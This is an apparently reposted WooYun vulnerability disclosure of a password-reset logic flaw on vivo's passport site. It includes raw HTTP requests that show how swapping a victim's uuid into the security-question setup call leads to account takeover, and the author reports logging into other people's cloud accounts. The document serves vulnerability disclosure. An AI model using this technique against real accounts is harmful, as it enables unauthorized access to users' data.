vivo官方设计缺陷任意用户密码密码重置

admin 2017年5月5日04:36:12评论623 views字数 219阅读0分43秒阅读模式
摘要

2016-03-12: 细节已通知厂商并且等待厂商处理中
2016-03-17: 厂商已经确认,细节仅向厂商公开
2016-03-27: 细节向核心白帽子及相关领域专家公开
2016-04-06: 细节向普通白帽子公开
2016-04-16: 细节向实习白帽子公开
2016-05-01: 细节向公众公开

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2016-183564

漏洞标题: vivo官方设计缺陷任意用户密码密码重置

相关厂商: vivo智能手机

漏洞作者: DloveJ

提交时间: 2016-03-12 09:18

公开时间: 2016-05-01 04:51

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 设计错误 搞笑有爱

1人收藏


漏洞详情

披露状态:

2016-03-12: 细节已通知厂商并且等待厂商处理中
2016-03-17: 厂商已经确认,细节仅向厂商公开
2016-03-27: 细节向核心白帽子及相关领域专家公开
2016-04-06: 细节向普通白帽子公开
2016-04-16: 细节向实习白帽子公开
2016-05-01: 细节向公众公开

简要描述:

vivo官方设计缺陷任意用户密码密码重置

正在看仙子大师傅的洞

提交过一次密码重置 忽略后 修复了

这次密码重置稍微有一点曲折

不知道这次会不会忽略

详细说明:

1、首先自己注册帐号

vivo官方设计缺陷任意用户密码密码重置

密保设置、设置好提交

code 区域
POST /v3/web/personal/subPwdProtect HTTP/1.1
Host: passport.vivo.com.cn
Connection: close
Content-Length: 310
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://passport.vivo.com.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://passport.vivo.com.cn/v3/web/login/toPwdProPage?uuid=b4b27ef0-4fae-487a-8eb6-b26ea22d0f69
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: outer_refer=""; force_device=pc; 1.1457698245560; vivo_account_cookie_iqoo_openid=03331b8ab5ba47c7; JSESSIONID=F1C3698A246772E475057671BEAD6FAC; cnum=null; vivo_cookie_unique_id=OkPHpVbitxwSCT/yB50LAg==

info={"uuid":"6a489b2*****d9fd00c","questions":[{"num":"1","question":"您父亲的名字?","answer":"123"},{"num":"2","question":"您母亲的名字?","answer":"456"},{"num":"3","question":"您就读的小学是?","answer":"789"}]}&uuid=b4b27ef0-4fae-487a-8eb6-b26ea22d0f69&locale=zh_CN

2、找uid eg:

code 区域
https://passport.vivo.com.cn/v3/web/findpwd/findPwd

vivo官方设计缺陷任意用户密码密码重置

code 区域
POST /v3/web/findpwd/isExistUser HTTP/1.1
Host: passport.vivo.com.cn
Connection: close
Content-Length: 40
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://passport.vivo.com.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://passport.vivo.com.cn/v3/web/findpwd/findPwd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=D3B030D5ADABD37C9D8BE8C10C1594DB

&locale=zh_CN

自动返回uuid

vivo官方设计缺陷任意用户密码密码重置

3、将1中包uuid替换为2中找到的uuid

code 区域
1a36bffb-96af-4ca0-a091-74dff889e47f

然后发出

vivo官方设计缺陷任意用户密码密码重置

4、正常重置

vivo官方设计缺陷任意用户密码密码重置

发现账户已经多了一种方式

直接输入设定好的密保的答案即可

5、登陆

vivo官方设计缺陷任意用户密码密码重置

可以进vivo云服务

https://webcloud.vivo.com.cn

测试同学帐号 都没有同步

vivo官方设计缺陷任意用户密码密码重置

官方帐号也没有东西 ,,,失望。。

漏洞证明:

========

密吗yxtest123

==========

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-03-17 04:51

厂商回复:

感谢关注

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-12 09:23 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1

    666

  2. 2016-03-17 07:41 | DloveJ ( 普通白帽子 | Rank:1427 漏洞数:255 | 专业潜水哒~)

    1

    醉了。。。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin